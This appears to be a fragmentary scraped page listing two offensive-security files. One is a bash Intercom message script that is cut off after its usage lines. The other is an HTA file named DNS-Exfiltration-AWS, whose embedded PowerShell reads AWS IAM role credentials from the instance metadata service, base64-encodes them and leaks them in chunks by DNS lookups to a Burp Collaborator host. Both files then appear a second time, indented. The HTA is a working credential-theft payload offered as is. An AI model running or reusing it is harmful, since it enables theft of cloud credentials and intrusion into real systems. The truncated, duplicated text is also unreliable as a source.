hateshape

## get-intercom-messages.sh
#!/bin/bash
# If it "no worked" (Technical Term) then you probably need to install jq!

# Pretty Colors
RESET='\033[00m'
BLUE='\033[01;34m'

usage() {
  echo -e ${BLUE}"Usage: $0 [ -a APPID ] [ -s SESSION ]"${RESET} 1>&2
  echo -e ${BLUE}"\n   Example: "${RESET} 1>&2

## DNS-Exfiltration-AWS.hta
<html><head><meta name=ProgId content=htafile></head>
<hta:application id=x><script>
try { if (x.commandLine != ""){
new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
meta-data/iam/security-credentials/aws-ec2-role;$b=($a|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
 }
}
catch(ex){ alert('Error');}
	#!/bin/bash
	# If it "no worked" (Technical Term) then you probably need to install jq!

	# Pretty Colors
	RESET='\033[00m'
	BLUE='\033[01;34m'

	usage() {
	echo -e ${BLUE}"Usage: $0 [ -a APPID ] [ -s SESSION ]"${RESET} 1>&2
	echo -e ${BLUE}"\n Example: "${RESET} 1>&2
	<html><head><meta name=ProgId content=htafile></head>
	<hta:application id=x><script>
	try { if (x.commandLine != ""){
	new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
	meta-data/iam/security-credentials/aws-ec2-role;$b=($a\|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
	em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'\| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
	String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
	}
	}
	catch(ex){ alert('Error');}